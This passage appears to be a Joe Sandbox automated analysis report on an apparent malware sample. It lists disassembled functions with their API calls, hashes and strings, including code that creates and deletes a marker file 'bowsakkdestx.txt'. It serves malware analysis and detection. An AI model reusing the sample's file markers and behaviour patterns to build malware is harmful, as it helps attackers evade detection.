                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction ID: fd9cb28329cfa78af43791671519ecd601f3c95e8de6540e42f46b7e5fa17189
                                                                                                        • Opcode Fuzzy Hash: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction Fuzzy Hash: AF2137B6B403213FE210AA5DFC52B26B399EB94B24F004125F318EB2C2E6B1F810D7D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00F1C687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                        • Opcode ID: 7f5831a240ba6d0770ee46826e43988be048e17fa39b1130145cba323ab87fba
                                                                                                        • Instruction ID: 3692359b37ad628ba5c2ed4c19f019c70fe27ca536c69e637e9cfa9dee7ab9bb
                                                                                                        • Opcode Fuzzy Hash: 7f5831a240ba6d0770ee46826e43988be048e17fa39b1130145cba323ab87fba
                                                                                                        • Instruction Fuzzy Hash: 9E213B72208341ABD720DF28DC04BABBBE9EF81754F004A2EF48987291D775D544E7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C48B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C4A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: 92765f5adcf27b80a0b036f6bf0065c55e76cf63e7aa44e7294001f41f466e4e
                                                                                                        • Instruction ID: 88649ff8781f4c58ce3ea22232c4fec9fd691870b9759665ce7d6bdb87310217
                                                                                                        • Opcode Fuzzy Hash: 92765f5adcf27b80a0b036f6bf0065c55e76cf63e7aa44e7294001f41f466e4e
                                                                                                        • Instruction Fuzzy Hash: 43014972A8022C33DE30B6A4AC47FFFB35C8B51731F000197FE08D6180E6A58986B6D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                        • Opcode ID: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction ID: 6c60ca5677076bf3815c526cc9e2e498db1c9879f4d7b8363cbe2b704573a627
                                                                                                        • Opcode Fuzzy Hash: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction Fuzzy Hash: 8FF062B0C0531D9BEB00DFD5D9597DEBBB4BB08709F104259D9147A280D7BA1608CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C438
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C44E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1C45B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 610490371-2616962270
                                                                                                        • Opcode ID: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction ID: 0922b072f7bd7781445a5081a131b6321a65a6d68e2f3b61e790d0e3b3de6491
                                                                                                        • Opcode Fuzzy Hash: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction Fuzzy Hash: A0E0867568431E67EB20EBB0DC8AFD9776C9B04B01F000093BB48D60C0D6B0A584DAD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strtok
                                                                                                        • String ID:
                                                                                                        • API String ID: 3446180046-0
                                                                                                        • Opcode ID: 734e3ab566bfa8620fed5bd0c63eb1b245ad99d2e0b032a3aa3ebb2ccb2245ad
                                                                                                        • Instruction ID: b0f79aa3d1308da9fc350e7dc9b8b72b98a34c2bc32db489243af673e7059d1f
                                                                                                        • Opcode Fuzzy Hash: 734e3ab566bfa8620fed5bd0c63eb1b245ad99d2e0b032a3aa3ebb2ccb2245ad
                                                                                                        • Instruction Fuzzy Hash: 9881ACB1A00206DFEB14DF58D9807EEBBF1FF14314F14492DE80697281D7BAAA94DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F32130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974526305-0
                                                                                                        • Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                        • Instruction ID: 6b04a34bbd2873d8765df42fda4d6249fb269ab3b4ef55685d754093947a67d6
                                                                                                        • Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                        • Instruction Fuzzy Hash: 5B51CE31E007059BEBA89FA9CD80A6FB7B1AF41330F248729F935962D0D774DE50AB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F4C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F4C6AD
                                                                                                        • __isleadbyte_l.LIBCMT ref: 00F4C6DB
                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F4C709
                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F4C73F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 5cbcfdb799dd443991e93b7aa1e97e660c93ed7ac07c95b1afc38184956cb507
                                                                                                        • Instruction ID: 6fb8c094938371a36a6c0509715a6cbe44a7c27f6c515fcd31aa33f2423a73c3
                                                                                                        • Opcode Fuzzy Hash: 5cbcfdb799dd443991e93b7aa1e97e660c93ed7ac07c95b1afc38184956cb507
                                                                                                        • Instruction Fuzzy Hash: 9731CF31A02206EFDB618F75CC44BAA7FA9FF41320F15A429E854871A0E731E850EBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00F1F125
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00F1F198
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00F1F1A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F1F1A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1421093161-0
                                                                                                        • Opcode ID: 5a455ca94eb7eabfbc373746c5a3cfe4dad22752eeb9b60a98c1250742861686
                                                                                                        • Instruction ID: b983a824017ffa3cc3f3dc154d6d185116fb7a2b2f2c4ac8d9564aeb05f51ca6
                                                                                                        • Opcode Fuzzy Hash: 5a455ca94eb7eabfbc373746c5a3cfe4dad22752eeb9b60a98c1250742861686
                                                                                                        • Instruction Fuzzy Hash: 7D312232A00209FBDB049F68CC4ABEE7B79EB05714F508129F805A71C0D775AA89DBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00FD7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00FD70AB
                                                                                                          • Part of subcall function 00FD77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00FD77D2
                                                                                                          • Part of subcall function 00FD77A0: ___AdjustPointer.LIBCMT ref: 00FD77E9
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00FD70C2
                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00FD70D4
                                                                                                        • CallCatchBlock.LIBCMT ref: 00FD70F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2901542994-0
                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction ID: 361b905be228522e809e84bd1e76a55e94c990872c0401f098e44e9a85337dc3
                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction Fuzzy Hash: 87012932400208BBCF126F55CC05EDA3BBBFF88714F184016FD1866221E336E961EBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F353B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F35007: __getptd_noexit.LIBCMT ref: 00F35008
                                                                                                          • Part of subcall function 00F35007: __amsg_exit.LIBCMT ref: 00F35015
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35A01
                                                                                                          • Part of subcall function 00F38C96: __calloc_impl.LIBCMT ref: 00F38CA5
                                                                                                        • __lock.LIBCMT ref: 00F35A37
                                                                                                        • ___addlocaleref.LIBCMT ref: 00F35A43
                                                                                                        • __lock.LIBCMT ref: 00F35A57
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580527540-0
                                                                                                        • Opcode ID: 9ad92c68bea7a04047ea4ce2d5effbe4df7026554e3ad5d7b523910692ab03f2
                                                                                                        • Instruction ID: 8662862152116c1f7f151848b22322afb224ff91b49657e01cd8ee4b7d1ed806
                                                                                                        • Opcode Fuzzy Hash: 9ad92c68bea7a04047ea4ce2d5effbe4df7026554e3ad5d7b523910692ab03f2
                                                                                                        • Instruction Fuzzy Hash: 10015272941740DFDB20FFA88C42B1D7BE09F81B70F204249F4659B2C6CE7C5941BA65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F509B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction ID: 17738081dfb00625a74465165169b7e4db817906d36e5fe9c4220b9237076c56
                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction Fuzzy Hash: 1601403640014EBFCF125E84CC528EE3F66BB29356F588455FF1958135CA3AC9B6BB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F227A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32 ref: 00F227B9
                                                                                                        • _malloc.LIBCMT ref: 00F227C3
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F227CE
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00F227E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
